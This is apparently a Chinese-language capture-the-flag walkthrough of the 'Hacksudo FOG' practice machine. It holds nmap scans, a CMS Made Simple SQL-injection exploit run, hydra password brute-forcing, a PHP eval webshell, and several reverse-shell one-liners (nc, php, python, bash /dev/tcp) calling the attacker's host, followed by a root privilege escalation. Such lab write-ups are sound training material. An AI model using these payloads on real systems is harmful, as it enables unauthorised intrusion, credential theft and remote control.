nmap -sP 10.80.56.0/24
主机:10.80.56.101
靶机:10.80.56.156
nmap -p- 10.80.56.156
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2049/tcp open nfs
3306/tcp open mysql
39693/tcp open unknown
46723/tcp open unknown
52037/tcp open unknown
60457/tcp open unknown
nmap -A -p 1-65535 10.80.56.156
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Hacksudo FOG
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 48453/udp mountd
| 100005 1,2,3 52037/tcp mountd
| 100005 1,2,3 55199/tcp6 mountd
| 100005 1,2,3 60205/udp6 mountd
| 100021 1,3,4 33657/tcp6 nlockmgr
| 100021 1,3,4 39693/tcp nlockmgr
| 100021 1,3,4 43561/udp nlockmgr
| 100021 1,3,4 59770/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs 3-4 (RPC #100003)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 90
| Capabilities flags: 63486
| Some Capabilities: DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, SupportsCompression, LongColumnFlag, InteractiveClient, Support41Auth, FoundRows, Speaks41ProtocolNew, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: (N2Kd7$N>*WW0's//>,]
|_ Auth Plugin Name: mysql_native_password
39693/tcp open nlockmgr 1-4 (RPC #100021)
46723/tcp open mountd 1-3 (RPC #100005)
52037/tcp open mountd 1-3 (RPC #100005)
60457/tcp open mountd 1-3 (RPC #100005)
#这里需要换一个目录字典才能扫出dict.txt
dirsearch -u http://10.80.56.156/
#访问发现是个字典
http://10.80.56.156/dict.txt
wget http://10.80.56.156/dict.txt
#访问获取获取作者提示的工具
view-source:http://10.80.56.156/index1.html
<!-- caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!>
<!-- box author : hacksudo --!>
#工具的作用是隐写密文到WAV文件中
Hiddenwave is a python based program for simple audio steganography. You can hide your secret text messages in wave audio file. you can play this audio in any media player and secretly share your private message with any one.
#访问发现是cms框架,一般这种使用框架的都要扫一下有没有可用的漏洞
http://10.80.56.156/cms/
http://10.80.56.156/cms/login.php
#获取框架专属的SQL注入脚本
searchsploit CMS made simple 2.2.5
searchsploit -m 46635.py
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
#修改python2语法为python3
python 46635.py -u http://10.80.56.156/cms/
#获取用户名,以及加密后的密码,尝试john破解和MD5在线解码都不行
[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3
#知道用户名和字典,尝试爆破ssh
hydra -l hacksudo -P dict.txt 10.80.56.156 ssh
#ssh失败,尝试爆破ftp,成功
hydra -l hacksudo -P dict.txt 10.80.56.156 ftp
[21][ftp] host: 10.80.56.156 login: hacksudo password: hackme
#登录获取第一个flag
cat flag1.txt
great you done step 1
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
|___/
www.hacksudo.com
#ftp下还有一个神秘的zip文件,但是有密码,尝试字典爆破
zip2john secr3tSteg.zip | tee hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
#成功解压获取,WAV文件
密码:feede
-rwxrwxrwx 1 root root 1573833 12月18日 23:24 secr3tSteg.zip
-rwxrwxrwx 1 root root 23 2021年 5月 6日 secr3t.txt
-rwxrwxrwx 1 root root 1965596 2021年 5月 6日 hacksudoSTEGNO.wav
#结合上面WAV隐写工具,提取密钥
python ./SoundStegno-main./ExWave.py -f hacksudoSTEGNO.wav
Your Secret Message is: Shift by 3 #根据提示可知凯撒密码,key为3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
#解密获取账户密码
key1 #3: wwww.localhost/fog Username=fog:password=hacksudoISRO
#登录发现文件上传,上传木马
a.phtml
<?php @eval($_POST['a'])?>
#尝试nc
nc -lvvp 6666
#nc为安装,上传nc也缺少环境,运行失败
nc -e /bin/bash 10.80.56.101 6666
/bin/sh: 1: nc: not found
#尝试php反弹,失败
php -r '$sock=fsockopen("10.80.56.101",6666); exec("/bin/sh -i <&3 >&3 2>&3");'
#尝试python反弹,失败
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.80.56.101",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#尝试bash反弹,失败
bash -c "bash -i >& /dev/tcp/10.80.56.101 6666>&1"
#最后在网站https://pentestmonkey.net/tools/web-shells/php-reverse-shell的shell脚本下载
#修改IP和端口,上传访问,反弹成功
python3 -c "import pty;pty.spawn('/bin/bash')"
#获取第二个flag
cat flag2.txt
you successfully crack web and got shell access!!!
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
step 2 done.
_ ____
___| |_ ___ _ __ |___ \
/ __| __/ _ \ '_ \ __) |
\__ \ || __/ |_) | / __/
|___/\__\___| .__/ |_____|
|_|
#尝试sql文件是否含有账户数据,并没有
cp fog_sql_1.5.9_20210508_120942.sql /var/www/html/a.sql
#尝试爆破isro用户密码,成功
hydra -l isro -P /usr/share/wordlists/rockyou.txt 10.80.56.156 ssh
[22][ssh] host: 10.80.56.156 login: isro password: qwerty
cat user.txt
8b64d2451b7a8f3fd17390f88ea35917
#发现isro下有多个可执行文件,strings看是否有suid权限
strings fog | grep uid
#运行fog程序,发现是root权限
os.system("id")
uid=0(root) gid=1003(isro) groups=1003(isro)
#提权成功
os.system("/bin/bash -i")
#获得最后flag,通关。
cat root.txt
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' DIE `98v8P' HUMAN `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.od
b. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
great you rooted hacksudo Fog Box !!!
flag {4356a779ce18252fa1dd2d2b6ab56b19}
submit this flag at hacksudo discord https://discord.gg/vK4NRYt3
HACKSUDO_FOG靶机渗透记录
最新推荐文章于 2024-06-14 09:22:46 发布